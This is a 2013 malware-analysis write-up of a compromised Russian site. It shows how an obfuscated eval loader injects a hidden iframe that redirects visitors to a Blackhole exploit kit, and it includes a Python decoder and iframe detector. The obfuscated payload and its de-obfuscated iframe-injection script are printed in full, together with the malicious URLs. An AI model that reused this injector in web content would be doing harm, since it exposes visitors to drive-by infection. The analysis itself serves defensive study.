Huge Redirector ARCHIVE.F1ONLINE.SU leads to BHEK via IFRAME

MalwareMustDie, Jan 2nd, 2013
=======================================
MalwareMustDie - Happy New Year Case-2
A huge infector found at the archive.f1online.su server
Using an iframe implanted in a hijacked service that has since been suspended..
Leads to the Blackhole infector server
======================================

// The domain registration (whois) info:
domain:        F1ONLINE.SU
nserver:       ns1.ns64.com.
nserver:       ns2.ns64.com.
state:         REGISTERED, DELEGATED
person:        Private Person
e-mail:        hanprokiller@yandex.ru
registrar:     RUCENTER-REG-FID
created:       2010.03.16
paid-till:     2013.03.16
free-date:     2013.04.18
source:        TCI
Last updated on 2013.01.02 15:51:35 MSK

// infector list, source: spam...

// server DNS info (A record and SOA):
archive.f1online.su.    3600    IN      A       194.28.132.130
archive.f1online.su
        origin = ns1.ns64.com
        mail addr = webmaster.archive.f1online.su
        serial = 1
        refresh = 10800
        retry = 3600
        expire = 604800
        minimum = 3600


// Let's check why it got infected, and with what.
// took some samples, they lead to the same redirection...
// PoC:

h00p://archive.f1online.su/index.php?s=96f14a35edf55e062c1a613186b6a8e8

// finding out the reason why.... grab it..

--20:03:25--  h00p://archive.f1online.su/index.php?s=96f14a35edf55e062c1a613186b6a8e8
           => `index.php@s=96f14a35edf55e062c1a613186b6a8e8'
Resolving archive.f1online.su... seconds 0.00, 194.28.132.130
Caching archive.f1online.su => 194.28.132.130
Connecting to archive.f1online.su|194.28.132.130|:80... seconds 0.00, connected.
GET /index.php?s=96f14a35edf55e062c1a613186b6a8e8 HTTP/1.0
User-Agent: #MalwareMustDie - Wishing you a terrible 2013 year!
Accept: */*
Host: archive.f1online.su
Connection: Keep-Alive
HTTP request sent, awaiting response...
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 02 Jan 2013 11:03:21 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.2.14
Set-Cookie: session_id=baf0913e29b2023470b4ed83bf5f1f9f; path=/; httponly
Content-Language: ru
200 OK
Length: unspecified [text/html]
20:03:30 (92.29 KB/s) - `index.php@s=96f14a35edf55e062c1a613186b6a8e8' saved [261760]


// found this obfuscation code in the saved page: a base-25 encoded array, decoded with
// String.fromCharCode and handed to eval. The question is "is it malicious??" We'll see.

try{window.document.body=window.document.body}catch(dgsgsdg){zxc=1;}try{if(window.document)window["doc"+"ument"]["body"]=window.document}catch(bawetawe)
{if(window.document){v=window;try{fawbe--}catch(afnwenew){try{(v+v)()}catch(gngrthn){try{if(020===0x10)v["document"]["b"+"o"+"dy"]="123"}catch(gfdnfdgber)
{if("".substr)ev=eval;}}
n=["9","9","45","42","17","1f","40","4b","3o","4h","49","41","4a","4g","1l","43","41","4g","2j","48","41","49","41","4a","4g","4f","2g","4l","39",
"3m","43","33","3m","49","41","1f","1e","3n","4b","40","4l","1e","1g","3g","1n","3i","1g","4n","d","9","9","9","45","42","4e","3m","49","41","4e",
"1f","1g","29","d","9","9","50","17","41","48","4f","41","17","4n","d","9","9","9","40","4b","3o","4h","49","41","4a","4g","1l","4j","4e","45","4g",
"41","1f","19","2a","45","42","4e","3m","49","41","17","4f","4e","3o","2b","1e","44","4g","4g","4c","28","1m","1m","45","4a","49","41","40","45","3m",
"4f","4l","4f","1l","3o","4b","49","1m","42","41","41","40","1m","42","4e","3m","49","41","4f","1l","4c","44","4c","2d","4h","45","40","2b","23","24",
"1d","42","4e","3m","49","41","4f","2b","23","1e","17","4j","45","40","4g","44","2b","1e","1o","1n","1e","17","44","41","45","43","44","4g","2b","1e",
"1o","1n","1e","17","4f","4g","4l","48","41","2b","1e","4i","45","4f","45","3n","45","48","45","4g","4l","28","44","45","40","40","41","4a","29","4c",
"4b","4f","45","4g","45","4b","4a","28","3m","3n","4f","4b","48","4h","4g","41","29","48","41","42","4g","28","1n","29","4g","4b","4c","28","1n","29",
"1e","2c","2a","1m","45","42","4e","3m","49","41","2c","19","1g","29","d","9","9","50","d","9","9","42","4h","4a","3o","4g","45","4b","4a","17","45",
"42","4e","3m","49","41","4e","1f","1g","4n","d","9","9","9","4i","3m","4e","17","42","17","2b","17","40","4b","3o","4h","49","41","4a","4g","1l","3o",
"4e","41","3m","4g","41","2j","48","41","49","41","4a","4g","1f","1e","45","42","4e","3m","49","41","1e","1g","29","42","1l","4f","41","4g","2f","4g",
"4g","4e","45","3n","4h","4g","41","1f","1e","4f","4e","3o","1e","1j","1e","44","4g","4g","4c","28","1m","1m","45","4a","49","41","40","45","3m","4f",
"4l","4f","1l","3o","4b","49","1m","42","41","41","40","1m","42","4e","3m","49","41","4f","1l","4c","44","4c","2d","4h","45","40","2b","23","24","1d",
"42","4e","3m","49","41","4f","2b","23","1e","1g","29","42","1l","4f","4g","4l","48","41","1l","4i","45","4f","45","3n","45","48","45","4g","4l","2b",
"1e","44","45","40","40","41","4a","1e","29","42","1l","4f","4g","4l","48","41","1l","4c","4b","4f","45","4g","45","4b","4a","2b","1e","3m","3n","4f",
"4b","48","4h","4g","41","1e","29","42","1l","4f","4g","4l","48","41","1l","48","41","42","4g","2b","1e","1n","1e","29","42","1l","4f","4g","4l","48",
"41","1l","4g","4b","4c","2b","1e","1n","1e","29","42","1l","4f","41","4g","2f","4g","4g","4e","45","3n","4h","4g","41","1f","1e","4j","45","40","4g",
"44","1e","1j","1e","1o","1n","1e","1g","29","42","1l","4f","41","4g","2f","4g","4g","4e","45","3n","4h","4g","41","1f","1e","44","41","45","43","44",
"4g","1e","1j","1e","1o","1n","1e","1g","29","d","9","9","9","40","4b","3o","4h","49","41","4a","4g","1l","43","41","4g","2j","48","41","49","41","4a",
"4g","4f","2g","4l","39","3m","43","33","3m","49","41","1f","1e","3n","4b","40","4l","1e","1g","3g","1n","3i","1l","3m","4c","4c","41","4a","40","2h",
"44","45","48","40","1f","42","1g","29","d","9","9","50"];
h=2;s="";if(zxc)for(i=0;i-615!=0;i++){k=i;s+=String.fromCharCode(parseInt(n[i],25));}z=s;if(window.document)ev(""+z)}}}


// In short, the de-obfuscation result:

// If <body> already exists, the iframe is built with DOM calls; otherwise it is
// written directly. Either way it is a hidden 10x10 frame pointing at the Blackhole landing page.
if (document.getElementsByTagName('body')[0]){
  iframer();
}
else {
  document.write("<iframe src='http://inmediasys.com/feed/frames.php?uid=56&frames=5' " +
    "width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
function iframer(){
  var f = document.createElement('iframe');
  f.setAttribute('src', 'http://inmediasys.com/feed/frames.php?uid=56&frames=5');
  f.style.visibility = 'hidden';
  f.style.position = 'absolute';
  f.style.left = '0';
  f.style.top = '0';
  f.setAttribute('width', '10');
  f.setAttribute('height', '10');
  document.getElementsByTagName('body')[0].appendChild(f);
}
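A small analysis helper, added here as an example and not MalwareMustDie's own code, that replays the decoder loop of the obfuscated sample above without its final eval, and then flags hidden or 10x10 iframes in the result, whether written as a literal tag or built with createElement/setAttribute as in iframer(). The function names are mine; the sample array is the first 14 entries of the n array above, and the sample script is the de-obfuscated result reproduced as a constructed string.

```python
import re
from typing import Dict, List

# Constructed sample: the first 14 entries of the paste's "n" array. The real
# array has 615 entries and decodes to the whole script shown above.
SAMPLE_N = ["9", "9", "45", "42", "17", "1f", "40", "4b",
            "3o", "4h", "49", "41", "4a", "4g"]

# Constructed sample: the de-obfuscated script, covering both the
# document.write branch and the DOM-built iframer() branch.
SAMPLE_SCRIPT = """
document.write("<iframe src='http://inmediasys.com/feed/frames.php?uid=56&frames=5' width='10' height='10'
 style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
function iframer(){
  var f = document.createElement('iframe');
  f.setAttribute('src', 'http://inmediasys.com/feed/frames.php?uid=56&frames=5');
  f.style.visibility = 'hidden';
  f.setAttribute('width', '10');
  f.setAttribute('height', '10');
}
"""

def decode_radix_array(n: List[str], radix: int = 25) -> str:
    """The loop from the sample, s += String.fromCharCode(parseInt(n[i], 25)),
    minus the ev(z) call. A token that is not valid in the radix is kept
    as <token> so a corrupted array is visible instead of silently skipped."""
    out = []
    for tok in n:
        try:
            out.append(chr(int(tok, radix)))
        except ValueError:
            out.append(f"<{tok}>")
    return "".join(out)

IFRAME_TAG = re.compile(r"<iframe\b([^>]*)>", re.IGNORECASE)
ATTR = re.compile(r"""([a-zA-Z-]+)\s*=\s*(['"])(.*?)\2""", re.DOTALL)
DOM_SRC = re.compile(r"""setAttribute\(\s*['"]src['"]\s*,\s*['"]([^'"]+)['"]""")
DOM_HIDDEN = re.compile(r"""style\.visibility\s*=\s*['"]hidden['"]|style\.display\s*=\s*['"]none['"]""")

def _is_tiny(attrs: Dict[str, str]) -> bool:
    """10x10 or smaller, as in the sample; non-numeric sizes are not tiny."""
    try:
        return int(attrs.get("width", "999")) <= 10 and int(attrs.get("height", "999")) <= 10
    except ValueError:
        return False

def find_hidden_iframes(text: str) -> List[Dict[str, str]]:
    """Flag iframes that are hidden by style or at most 10x10, whether written
    as a literal <iframe> tag or built with createElement/setAttribute."""
    hits = []
    for m in IFRAME_TAG.finditer(text):
        attrs = {k.lower(): v for k, _, v in ATTR.findall(m.group(1))}
        style = attrs.get("style", "").replace(" ", "").lower()
        hidden = "visibility:hidden" in style or "display:none" in style
        if hidden or _is_tiny(attrs):
            hits.append({"src": attrs.get("src", ""), "how": "html"})
    # DOM-built variant: report the src only when the script also hides the frame
    if DOM_HIDDEN.search(text):
        for src in DOM_SRC.findall(text):
            hits.append({"src": src, "how": "dom"})
    return hits
```

Running decode_radix_array on the full n array from the paste yields the script shown above; feeding that output to find_hidden_iframes gives the inmediasys.com URL from both branches.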

// try to fetch this....

--20:08:48--  http://inmediasys.com/feed/frames.php?uid=56&frames=5
           => `frames.php@uid=56&frames=5'
Resolving inmediasys.com... seconds 0.00, failed: Unknown host.

// seek further....

Domain Name: INMEDIASYS.COM

 Registrant:
     N/A
    Joanie Kenny        (joanie_kenny601@startrekmail.com)
    Clara Van St
    Austin
    TX,78734
    US
    Tel. +1.0898265608

 Creation Date: 20-Nov-2012
 Expiration Date: 20-Nov-2013

 Domain servers in listed order:
     ns1.suspended-domain.com
     ns2.suspended-domain.com


// domain down, looks suspended... The question is still unanswered: WHY?
//
// the evidence is the URL below:
// http://inmediasys.com/feed/frames.php?uid=56&frames=5


// let's make sure.. check every DB for URLs with a similar pattern...
// found in urlquery:
//   http://193.107.85.36/report.php?id=209160
// where a similar URL was recorded:
// http://inmediasys.com/feed/xml.php?98679407&uid=56


// urlquery also recorded the HTTP request headers that were sent:

GET /feed/xml.php?98679407&uid=56 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://inmediasys.com/feed/frames.php?uid=56&frames=5

// and the server replied:

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: nginx
Date: Thu, 22 Nov 2012 16:39:35 GMT
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.16-1~dotdeb.0
Cache-Control: no-store, no-cache, must-revalidate
Content-Encoding: gzip

// ↑ It's a Blackhole (BHEK) infector

// Now we know why it is evil:
// an IFRAME used in an evil way.
// The good thing is the domains are blocked, except the infector itself.
// Someone must notify f1online.su so it gets cleaned up.

----
#MalwareMustDie
[0x00000000]> !date
Wed Jan  2 20:48:05 JST 2013